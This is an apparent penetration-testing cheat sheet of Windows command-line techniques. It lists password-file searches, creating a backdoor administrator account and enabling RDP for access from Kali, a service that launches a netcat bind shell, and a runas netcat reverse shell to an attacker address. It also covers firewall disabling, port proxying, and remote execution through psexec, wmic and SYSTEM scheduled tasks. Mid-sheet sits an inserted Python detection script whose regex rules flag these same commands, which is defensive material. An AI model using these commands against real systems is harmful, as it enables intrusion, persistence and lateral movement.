Windows cmd kungfu
Read Files
type myfile ..display
type *.txt ..multiple
type my1 my2 ..multiple
type my1 | find /i "pass" ..search-in-file
type my1 | findstr [regex] ..regex
more my1 ..one page at a time
Environment
set ..view env vars
set path ..view path
set username ..view username
Search:
b - bare
s - subdir/recurse
dir /b /s mydir\file
dir /b /s c:\pass.txt ..search all of c: for 'pass.txt', even subfolders; wildcards are supported too
dir /b /s %systemroot%\hosts ..find the hosts file
Software Inventory Search:
dir /s "c:\Program Files"
dir /s "c:\Program Files (x86)"
Windows Users
net user
net user mike p$$wrd /add
net user mike /del
net localgroup
net localgroup administrators
net localgroup administrators mike /add
net localgroup administrators mike /del
AD Lockout Settings
net accounts /domain
RDP Trick
REF: PrivEscWin-Churrasco
> net user
> net user mikes hacks /add
> net localgroup administrators mikes /add
Allow Remote Access:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali:
> sudo apt-get update
> sudo apt-get install rdesktop
> rdesktop -u mike -p hacks legacy ..CONNECT WITH RDP !!!
Windows Password policy
net accounts
net accounts /domain
wmic useraccount list brief
Windows registry
reg query key1
reg query \\mypc\key1 ..query a remote machine
reg add key1 /v value /t type /d data
reg export key1 key.reg
reg import key.reg
Windows smb
REF: MoveFilesSMB
session:
net use \\IP pw /u:bob
mount:
net use * \\IP\share pw /u:bob
net use \\IP /del
net use * /del /y
may need:
/u:machinename\bob
Windows services
sc query ..active services
sc query state= all ..all services
sc qc svcname ..service config
sc \\10.0.0.5 qc mysvc ..remote machine
sc start mysvc
sc config mysvc start= demand
sc stop mysvc
services.msc ..gui
wmic:
wmic service where (displayname like "%hello%") get name
Windows psexec
net use \\$IP /u:bob ..get smb session
psexec \\$IP -d -u user -p pass command ..leaves svc @finish
psexec \\$IP ipconfig
psexec \\$IP cmd.exe
psexec \\$IP cmd.exe -s -d ..system, detached/background
Windows schedule tasks
schtasks /query /s $IP
schtasks /create /tn taskname /s $IP /u bob /p pass /sc freq /st stime /sd sdate /tr command
schtasks /create /tn taskname /s $IP /ru system /sc HOURLY|ONCE|DAILY /st HH:MM /sd sdate /tr command ..run as SYSTEM
Windows Services & Processes
net use \\$IP /u:bob ..get smb session first!!
sc \\$IP query schedule
sc \\$IP create svcnm binpath= mycmd ..30 sec
sc \\$IP create svcnm binpath= "cmd.exe /k mycmd" ..will die
sc \\$IP create ncsvc binpath= "cmd.exe /k c:\Tools\nc.exe -lp 4444 -e cmd.exe"
sc \\$IP start svcnm
net time \\$IP
or 'ServifyThis'
wmic /node:10.x.x.x /user:bobadmin /password:p@ss process call create [command]
Multiple sessions (node list read from a file):
wmic /node:@C:\tmp\iplist /user:bob /password:paxx process call create [command]
Look at processes:
wmic /node:$IP /user:bob /password:paxx process list brief
wmic /node:$IP /user:bob /password:paxx process where processid="PID" delete
wmic /node:$IP /user:bob /password:paxx process where name="[name]" delete
Windows Firewall
netsh /? ..view network settings
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh advfirewall firewall add rule name="Comment" dir=in action=allow remoteip=$IP protocol=TCP localport=23
netsh advfirewall firewall delete rule name="Comment"
Port-forward:
netsh interface portproxy add v4tov4 listenport=8000 connectport=80 connectaddress=$IP
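A defender-side check tying together the Users, RDP, Services, schedule-tasks and Firewall sections above: an added Python example, not part of this cheat sheet, that runs pattern rules for those exact command forms over a constructed process-creation log in an assumed host|user|cmdline format; the rule names, log format and sample records are all assumptions.

```python
import re

# Pattern rules keyed on the exact command forms in this cheat sheet (net user,
# net localgroup, reg add fDenyTSConnections, sc create, schtasks, netsh, wmic).
RULES = [
    ("local-account-created", r"\bnet\s+user\s+\S+\s+\S+\s+/add\b"),
    ("admin-group-member-added", r"\bnet\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("rdp-enabled-via-registry", r"\breg\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b"),
    ("service-wraps-cmd-shell", r'\bsc\b.*\bcreate\b.*binpath=\s*"?cmd\.exe\s+/k'),
    ("scheduled-task-as-system", r"\bschtasks\s+/create\b.*/ru\s+system\b"),
    ("firewall-disabled", r"\bnetsh\s+advfirewall\s+set\s+allprofiles\s+state\s+off\b"),
    ("portproxy-added", r"\bnetsh\s+interface\s+portproxy\s+add\b"),
    ("remote-process-via-wmic", r"\bwmic\s+/node:.*\bprocess\s+call\s+create\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

def classify(cmdline):
    """Return the names of every rule matching one process command line."""
    return [name for name, rx in COMPILED if rx.search(cmdline)]

def scan(records):
    """Walk 'host|user|cmdline' records (an assumed, simplified process-creation
    log format) and return (host, user, rule) triples for every match."""
    hits = []
    for rec in records:
        rec = rec.strip()
        if not rec or rec.startswith("#"):
            continue
        host, user, cmdline = rec.split("|", 2)  # cmdline may itself contain '|'
        for rule in classify(cmdline):
            hits.append((host, user, rule))
    return hits

# Constructed sample records, not real telemetry; the command lines are the
# ones this cheat sheet lists, plus two benign ones that must not fire.
SAMPLE_LOG = [
    "WS01|alice|dir /b /s c:\\pass.txt",
    "WS01|alice|net user mike p$$wrd /add",
    "WS01|alice|net localgroup administrators mike /add",
    'WS01|alice|reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    'SRV02|bob|sc \\\\10.0.0.5 create svcnm binpath= "cmd.exe /k mycmd"',
    "SRV02|bob|sc query state= all",
    "SRV02|bob|netsh advfirewall set allprofiles state off",
    "SRV02|bob|schtasks /create /tn taskname /s 10.0.0.5 /ru system /sc ONCE /st 10:00 /tr mycmd",
]

if __name__ == "__main__":
    for host, user, rule in scan(SAMPLE_LOG):
        print(f"{host} {user}: {rule}")
```

Each rule maps to one line of this sheet, so a hit tells you which of these actions ran; the two benign records (a dir search and sc query) produce no hit.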
runas
Creates a reverse shell from a Windows server to Kali
Using netcat for Windows and Runas.exe:
C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc $IP 4444 -e cmd.exe"
Enter the password for Test:
Attempting to start nc.exe as user "COMPUTERNAME\Test" ...